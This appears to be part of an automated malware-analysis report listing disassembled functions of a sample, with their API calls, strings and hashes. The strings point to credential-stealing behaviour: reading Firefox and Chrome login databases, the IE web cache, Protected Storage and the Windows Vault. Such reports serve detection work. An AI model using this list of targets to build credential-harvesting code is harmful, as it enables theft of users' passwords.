                                                                                                                                                                  • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                                                                  • API String ID: 3510742995-2641926074
                                                                                                                                                                  • Opcode ID: 53a30cc7d252268d97bb4665958255b11a08b07c7cd133945acccca950d5993c
                                                                                                                                                                  • Instruction ID: 2a909f6aa8b78d8aa74dd045bbec2887fe81728cdb5ed6237a850f532ee9234f
                                                                                                                                                                  • Opcode Fuzzy Hash: 53a30cc7d252268d97bb4665958255b11a08b07c7cd133945acccca950d5993c
                                                                                                                                                                  • Instruction Fuzzy Hash: 5A711CB1600201BFF310AF1ADC82B5AB798BB44719F15452FF45897782C7BDE9908B99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00410A52, Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 98COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00410C87: memset.MSVCRT ref: 00410CA3
                                                                                                                                                                    • Part of subcall function 00410C87: memset.MSVCRT ref: 00410CB8
                                                                                                                                                                    • Part of subcall function 00410C87: wcscat.MSVCRT ref: 00410CE1
                                                                                                                                                                    • Part of subcall function 00410C87: wcscat.MSVCRT ref: 00410D0A
                                                                                                                                                                  • memset.MSVCRT ref: 00410A9A
                                                                                                                                                                  • wcslen.MSVCRT ref: 00410AB1
                                                                                                                                                                  • wcslen.MSVCRT ref: 00410AB9
                                                                                                                                                                  • wcslen.MSVCRT ref: 00410B14
                                                                                                                                                                  • wcslen.MSVCRT ref: 00410B22
                                                                                                                                                                    • Part of subcall function 004083D6: wcscpy.MSVCRT ref: 004083DE
                                                                                                                                                                    • Part of subcall function 004083D6: wcscat.MSVCRT ref: 004083ED
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: wcslen$memsetwcscat$wcscpy
                                                                                                                                                                  • String ID: history.dat$places.sqlite
                                                                                                                                                                  • API String ID: 2541527827-467022611
                                                                                                                                                                  • Opcode ID: 25ea34a281439d809f371ac1cf7c0884433c21bdeb59f3c4b6e0df9e4197b33a
                                                                                                                                                                  • Instruction ID: 16c00ee82f17989474e920b03892a6de4e18c3fe0141c7e4295d5dc86641310b
                                                                                                                                                                  • Opcode Fuzzy Hash: 25ea34a281439d809f371ac1cf7c0884433c21bdeb59f3c4b6e0df9e4197b33a
                                                                                                                                                                  • Instruction Fuzzy Hash: 17314571D041189ADF10EBA5DC89ACDB3B8AF50319F20457FE554F2182EB7C9A84CB58
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00411CDB, Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 82COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: wcslen$memsetwcscatwcscpy
                                                                                                                                                                  • String ID: Login Data$Web Data
                                                                                                                                                                  • API String ID: 3932597654-4228647177
                                                                                                                                                                  • Opcode ID: 7231a64d0824cf94e0c730f6189b32a897f20d3e441a0ecaf3f9be98e6314f32
                                                                                                                                                                  • Instruction ID: 9a91d2e82c236d30763d7b9ebcc1a6cccb69c4478b10b945406aecd22e6d63c1
                                                                                                                                                                  • Opcode Fuzzy Hash: 7231a64d0824cf94e0c730f6189b32a897f20d3e441a0ecaf3f9be98e6314f32
                                                                                                                                                                  • Instruction Fuzzy Hash: 46218B7250411C6ADB10EB55EC89FDA73ACAF50328F14487FF518E3191EBBCDAC44658
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00417C9A, Relevance: 9.1, APIs: 6, Instructions: 140fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNELBASE(?,-7FBE8982,00000003,00000000,?,?,00000000), ref: 00417D72
                                                                                                                                                                  • CreateFileA.KERNEL32(?,-7FBE8982,00000003,00000000,004175FE,004175FE,00000000), ref: 00417D8A
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00417D99
                                                                                                                                                                  • free.MSVCRT(?), ref: 00417DA6
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateFile$ErrorLastfree
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 77810686-0
                                                                                                                                                                  • Opcode ID: a26124fb8da27f2cbfd9df83ebe6b72667bba8263af52734d4187cb9e803d476
                                                                                                                                                                  • Instruction ID: 35fec4397722218e6507e77f53b50855b574b2e4c8baf302a97b237cc2aa3bd3
                                                                                                                                                                  • Opcode Fuzzy Hash: a26124fb8da27f2cbfd9df83ebe6b72667bba8263af52734d4187cb9e803d476
                                                                                                                                                                  • Instruction Fuzzy Hash: D841F27150C3059FEB20CF25EC4179BBBF4EF84314F10892EF89592291D738DA848B96
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040FC4E, Relevance: 9.1, APIs: 6, Instructions: 84windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ??2@$DeleteHandleIconLoadModuleObjectmemset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3532479477-0
                                                                                                                                                                  • Opcode ID: 14c3c2aa7062e08bf63dc7d5d281a39e77aead53937f861c87ecd8ed2eee7028
                                                                                                                                                                  • Instruction ID: 6b7a5e441d588d9bc54ea64e01ff161f986e35cd5d296fb942180f783725d529
                                                                                                                                                                  • Opcode Fuzzy Hash: 14c3c2aa7062e08bf63dc7d5d281a39e77aead53937f861c87ecd8ed2eee7028
                                                                                                                                                                  • Instruction Fuzzy Hash: EA315EB19013888FDB30EF668C896CAB6E9BF45314F00863FE84DDB641DBB946448B59
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00410C87, Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 00410CA3
                                                                                                                                                                  • memset.MSVCRT ref: 00410CB8
                                                                                                                                                                    • Part of subcall function 00414558: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 00414592
                                                                                                                                                                    • Part of subcall function 00407DD1: wcslen.MSVCRT ref: 00407DD2
                                                                                                                                                                    • Part of subcall function 00407DD1: wcscat.MSVCRT ref: 00407DEA
                                                                                                                                                                  • wcscat.MSVCRT ref: 00410CE1
                                                                                                                                                                    • Part of subcall function 00414558: memset.MSVCRT ref: 004145B1
                                                                                                                                                                    • Part of subcall function 00414558: RegCloseKey.ADVAPI32(?), ref: 00414618
                                                                                                                                                                    • Part of subcall function 00414558: wcscpy.MSVCRT ref: 00414626
                                                                                                                                                                  • wcscat.MSVCRT ref: 00410D0A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                                                                                                                  • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                                                  • API String ID: 1534475566-1174173950
                                                                                                                                                                  • Opcode ID: 86b2fee5573bc67bc9087b08d08cdc2ad0ccfef1d6009a232684216d2b924b41
                                                                                                                                                                  • Instruction ID: 1b820a25e8b0a88a2df896ef0368420f7b9c24777a221978b2b2a3cd549cec0e
                                                                                                                                                                  • Opcode Fuzzy Hash: 86b2fee5573bc67bc9087b08d08cdc2ad0ccfef1d6009a232684216d2b924b41
                                                                                                                                                                  • Instruction Fuzzy Hash: 860152B294031C76EB20AB668C86EDB762C9F85358F0141AAB618B7142D97C9DC44AAD
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004034E3, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0040B1BF: free.MSVCRT(00000000,00410160,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,004448C6,00000000,?,0000000A), ref: 0040B1C6
                                                                                                                                                                    • Part of subcall function 00411E4C: memset.MSVCRT ref: 00411EC2
                                                                                                                                                                    • Part of subcall function 00411E4C: wcsrchr.MSVCRT ref: 00411EDB
                                                                                                                                                                    • Part of subcall function 00411BB2: SetCurrentDirectoryW.KERNEL32(?,?,?,00403557,?), ref: 00411BFF
                                                                                                                                                                  • memset.MSVCRT ref: 004035BC
                                                                                                                                                                  • memcpy.MSVCRT ref: 004035D0
                                                                                                                                                                  • wcscmp.MSVCRT ref: 004035F8
                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 0040362F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$CurrentDirectory_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1763786148-3916222277
                                                                                                                                                                  • Opcode ID: 09aee775218a621ff1fef0c9153cb1cfdc5fccf2e7c31d726b2849875dfa8a1e
                                                                                                                                                                  • Instruction ID: bd143a35ad5b1b32f57d6bfe9876d60f7f1e4d0a05a181755c1d953110edcb1c
                                                                                                                                                                  • Opcode Fuzzy Hash: 09aee775218a621ff1fef0c9153cb1cfdc5fccf2e7c31d726b2849875dfa8a1e
                                                                                                                                                                  • Instruction Fuzzy Hash: 24412A71D40229AADF20EFA5CC45ADEB7B8AF44318F1044ABE508B3241DB789B858F59
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00414558, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 004144AB: LoadLibraryW.KERNEL32(shell32.dll,0040FF7C,00000000,?,00000002,?,004448C6,00000000,?,0000000A), ref: 004144B9
                                                                                                                                                                    • Part of subcall function 004144AB: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 004144CE
                                                                                                                                                                  • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 00414592
                                                                                                                                                                  • memset.MSVCRT ref: 004145B1
                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00414618
                                                                                                                                                                  • wcscpy.MSVCRT ref: 00414626
                                                                                                                                                                    • Part of subcall function 004083A1: GetVersionExW.KERNEL32(00452E28,0000001A,00414579), ref: 004083BB
                                                                                                                                                                  Strings
                                                                                                                                                                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 004145CC, 004145DC
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressCloseFolderLibraryLoadPathProcSpecialVersionmemsetwcscpy
                                                                                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                  • API String ID: 2699640517-2036018995
                                                                                                                                                                  • Opcode ID: 1f48f7e9f744942bfd9fbef0cf09dbb4d3108d1291aa30ec74452a86fee1161f
                                                                                                                                                                  • Instruction ID: e12ff53167afe07261100608862af2d586d512a8c684a17975878dc8bda8b34c
                                                                                                                                                                  • Opcode Fuzzy Hash: 1f48f7e9f744942bfd9fbef0cf09dbb4d3108d1291aa30ec74452a86fee1161f
                                                                                                                                                                  • Instruction Fuzzy Hash: 42112B71800214BBEF20A759CC4EAEFB3BDDB85754F6100A7F914A2151E62C5FC5869E
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00413CFB, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • wcschr.MSVCRT ref: 00413D15
                                                                                                                                                                  • _snwprintf.MSVCRT ref: 00413D3A
                                                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,0044BCA0), ref: 00413D58
                                                                                                                                                                  • GetPrivateProfileStringW.KERNEL32(?,?,0041139B,?,00000000,0044BCA0), ref: 00413D70
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                                  • String ID: "%s"
                                                                                                                                                                  • API String ID: 1343145685-3297466227
                                                                                                                                                                  • Opcode ID: 02edbd4849e356a2dd53856aa56349abaee77aee134cad8029ffbeba199e4c17
                                                                                                                                                                  • Instruction ID: 73e04fdb7293ad0563e201354ce1ff8293903967f03a71563bfd8de655adbfaf
                                                                                                                                                                  • Opcode Fuzzy Hash: 02edbd4849e356a2dd53856aa56349abaee77aee134cad8029ffbeba199e4c17
                                                                                                                                                                  • Instruction Fuzzy Hash: 2401AD3240521EBBEF229F91EC45FDB3B6AFF04745F14806ABA1854062D779C660DB98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0041337C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041357A,00000000,?,?,?,?,00000000,?), ref: 0041338D
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 004133A7
                                                                                                                                                                  • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,0041357A,00000000,?,?,?,?,00000000,?), ref: 004133CA
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                                                                  • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                                  • API String ID: 1714573020-3385500049
                                                                                                                                                                  • Opcode ID: 309a91ae3d39bfd2be00db52258639a55574cbf10b15d42bee79424e3042c4b9
                                                                                                                                                                  • Instruction ID: da68f8d270a38a3c71bb0a1d73356e5427966c5ec0fa45e2ea30989c2ad8b33c
                                                                                                                                                                  • Opcode Fuzzy Hash: 309a91ae3d39bfd2be00db52258639a55574cbf10b15d42bee79424e3042c4b9
                                                                                                                                                                  • Instruction Fuzzy Hash: 41F01535140208AFEF108F91EC44B9A7BA9AB08B86F404026FE18C1162CB75DAA0DB5C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0041EAC1, Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcmp
                                                                                                                                                                  • String ID: @ $SQLite format 3
                                                                                                                                                                  • API String ID: 1475443563-3708268960
                                                                                                                                                                  • Opcode ID: e922d6e76d25ca0bc981f6f0caf64cc85a23792da3e792978c200f14c15407ff
                                                                                                                                                                  • Instruction ID: 378f5b88a64b421c164fea27eec5394a6c1f6cf5fd0cfe57e22cb817cc3972c5
                                                                                                                                                                  • Opcode Fuzzy Hash: e922d6e76d25ca0bc981f6f0caf64cc85a23792da3e792978c200f14c15407ff
                                                                                                                                                                  • Instruction Fuzzy Hash: 4E51C1B59002059BDF14DF6AC8817DAB7F4AF54314F15019BEC04EB34AE778EA85CB98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00409EB7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00409A23: OpenProcess.KERNEL32(00000040,00000000,?,00000104,00000000,?,00000104,00000000,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00409A98
                                                                                                                                                                    • Part of subcall function 00409A23: GetCurrentProcess.KERNEL32(00000000,80000000,00000000,00000000), ref: 00409AB7
                                                                                                                                                                    • Part of subcall function 00409A23: DuplicateHandle.KERNELBASE(00000000,00000104,00000000), ref: 00409AC4
                                                                                                                                                                    • Part of subcall function 00409A23: GetFileSize.KERNEL32(00000000,00000000), ref: 00409AD9
                                                                                                                                                                    • Part of subcall function 00409A23: CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000), ref: 00409B03
                                                                                                                                                                    • Part of subcall function 00409A23: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 00409B18
                                                                                                                                                                    • Part of subcall function 00409A23: WriteFile.KERNELBASE(?,00000000,00000104,0040A0FE,00000000), ref: 00409B33
                                                                                                                                                                    • Part of subcall function 00409A23: UnmapViewOfFile.KERNEL32(00000000), ref: 00409B3A
                                                                                                                                                                    • Part of subcall function 00409A23: FindCloseChangeNotification.KERNELBASE(?), ref: 00409B43
                                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040A0FE,000000FF,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00409F87
                                                                                                                                                                    • Part of subcall function 00409CB0: memset.MSVCRT ref: 00409D85
                                                                                                                                                                    • Part of subcall function 00409CB0: wcschr.MSVCRT ref: 00409DBD
                                                                                                                                                                    • Part of subcall function 00409CB0: memcpy.MSVCRT ref: 00409DF1
                                                                                                                                                                  • DeleteFileW.KERNELBASE(?,?,0040A0FE,000000FF,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00409FA8
                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF,?,0040A0FE,000000FF,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00409FCF
                                                                                                                                                                    • Part of subcall function 00409B7A: memset.MSVCRT ref: 00409BC2
                                                                                                                                                                    • Part of subcall function 00409B7A: _snwprintf.MSVCRT ref: 00409C5C
                                                                                                                                                                    • Part of subcall function 00409B7A: free.MSVCRT(000000FF,?,000000FF,00000000,00000104,76D7F560), ref: 00409C90
                                                                                                                                                                  Strings
                                                                                                                                                                  • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 00409EC7
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                                                                  • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat
                                                                                                                                                                  • API String ID: 3931293568-1514811420
                                                                                                                                                                  • Opcode ID: eeb481b1dff4e993c2893e9f0026ff803c1a702ff2030c6be45b7232c18bb5a2
                                                                                                                                                                  • Instruction ID: 3f51e9d3f4722dee63ca69fa5b044a2e48b650b6030bfe0f748ec1b1a5da80f7
                                                                                                                                                                  • Opcode Fuzzy Hash: eeb481b1dff4e993c2893e9f0026ff803c1a702ff2030c6be45b7232c18bb5a2
                                                                                                                                                                  • Instruction Fuzzy Hash: 65311CB1C006589BCF60DFA5CD855CDF7B8AF40314F1002AB9519F31A2DB755E858F58
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040E903, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _wcsicmpqsort
                                                                                                                                                                  • String ID: /nosort$/sort
                                                                                                                                                                  • API String ID: 1579243037-1578091866
                                                                                                                                                                  • Opcode ID: c14f26a3bd4bd4d31eab25ef7948187d43d10632211a5499f155237dcc845ca2
                                                                                                                                                                  • Instruction ID: da88191f08b8b868428b3ed71d9c82d207ce8b6ace4e6628c3e2187065429015
                                                                                                                                                                  • Opcode Fuzzy Hash: c14f26a3bd4bd4d31eab25ef7948187d43d10632211a5499f155237dcc845ca2
                                                                                                                                                                  • Instruction Fuzzy Hash: 7521F271700502AFD714FF36C981A5AB3A9FF95304B01097FE459A72D2CB7ABC218B99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040ADD0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00413ACB: FreeLibrary.KERNELBASE(?,0040ADDC), ref: 00413AD7
                                                                                                                                                                  • LoadLibraryW.KERNELBASE(pstorec.dll), ref: 0040ADE1
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 0040ADF4
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                  • String ID: PStoreCreateInstance$pstorec.dll
                                                                                                                                                                  • API String ID: 145871493-2881415372
                                                                                                                                                                  • Opcode ID: fdc831568e2784af9de8c5a906fe078fe08317c6051ed8042a8c169ffd09e9de
                                                                                                                                                                  • Instruction ID: 165486c3e6602412b12b5041488cd1e6311a4fd56e7abe132b6c53b1702dbca2
                                                                                                                                                                  • Opcode Fuzzy Hash: fdc831568e2784af9de8c5a906fe078fe08317c6051ed8042a8c169ffd09e9de
                                                                                                                                                                  • Instruction Fuzzy Hash: D8F0E2302807125BEB206F76DC06B9B32D8AF44B4AF10C43EA052D55C1EBBCD4808B9D
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00444E7A, Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ??3@
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 613200358-0
                                                                                                                                                                  • Opcode ID: 6dc2ae8407accaec33e914c995c073318a836f74cf280773562707ce9086f27d
                                                                                                                                                                  • Instruction ID: 83d98c8e739894f4f11ae52403c2f1a0732df397c2cb69f7507dcdbda06e161a
                                                                                                                                                                  • Opcode Fuzzy Hash: 6dc2ae8407accaec33e914c995c073318a836f74cf280773562707ce9086f27d
                                                                                                                                                                  • Instruction Fuzzy Hash: F7E04DA070030136BB20AFBAFD44B0323CC3A90793326482FB406D73D2EE2CE840A52C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0043A0F8, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 967COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043A1CA
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset
                                                                                                                                                                  • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                                  • API String ID: 2221118986-1725073988
                                                                                                                                                                  • Opcode ID: a02f6a0a02fcd16c7aa4dd96e86c2c528519a914f69e8e6aa23dcbcbdf6080a7
                                                                                                                                                                  • Instruction ID: e3eeb75a8af282f970fbf78469263b11f6465a284568bf7e48a5e115ce459d1a
                                                                                                                                                                  • Opcode Fuzzy Hash: a02f6a0a02fcd16c7aa4dd96e86c2c528519a914f69e8e6aa23dcbcbdf6080a7
                                                                                                                                                                  • Instruction Fuzzy Hash: F1828771A00208AFDF24DF69C881AAE7BA1FF08314F14411AFD559B3A2D77AEC51CB95
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040B25F, Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ??2@
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1033339047-0
                                                                                                                                                                  • Opcode ID: 7383806280aca4e1821e19982c5cfbbe854b0cbcf0857156c862d8a82c6a6e7a
                                                                                                                                                                  • Instruction ID: 41d6ca53bbc25777d15e7d44d7af272a9a829ad4135043ac9a1f5f7c0c786f2e
                                                                                                                                                                  • Opcode Fuzzy Hash: 7383806280aca4e1821e19982c5cfbbe854b0cbcf0857156c862d8a82c6a6e7a
                                                                                                                                                                  • Instruction Fuzzy Hash: ED0112F12023007FEB69DF38ED1772A66949B95393F00413FA506CD2F6EA79D5449B08
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004444B7, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 121COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 004443B0: LoadLibraryW.KERNELBASE(vaultcli.dll,?,00000000), ref: 004443BD
                                                                                                                                                                    • Part of subcall function 004443B0: GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 004443D2
                                                                                                                                                                    • Part of subcall function 004443B0: GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 004443DF
                                                                                                                                                                    • Part of subcall function 004443B0: GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 004443EC
                                                                                                                                                                    • Part of subcall function 004443B0: GetProcAddress.KERNEL32(00000000,VaultFree), ref: 004443F9
                                                                                                                                                                    • Part of subcall function 004443B0: GetProcAddress.KERNEL32(00000000,VaultGetInformation), ref: 00444406
                                                                                                                                                                    • Part of subcall function 004443B0: GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 00444414
                                                                                                                                                                    • Part of subcall function 004443B0: GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 0044441D
                                                                                                                                                                  • memcmp.MSVCRT ref: 0044455D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$LibraryLoadmemcmp
                                                                                                                                                                  • String ID: $$8
                                                                                                                                                                  • API String ID: 2708812716-435121686
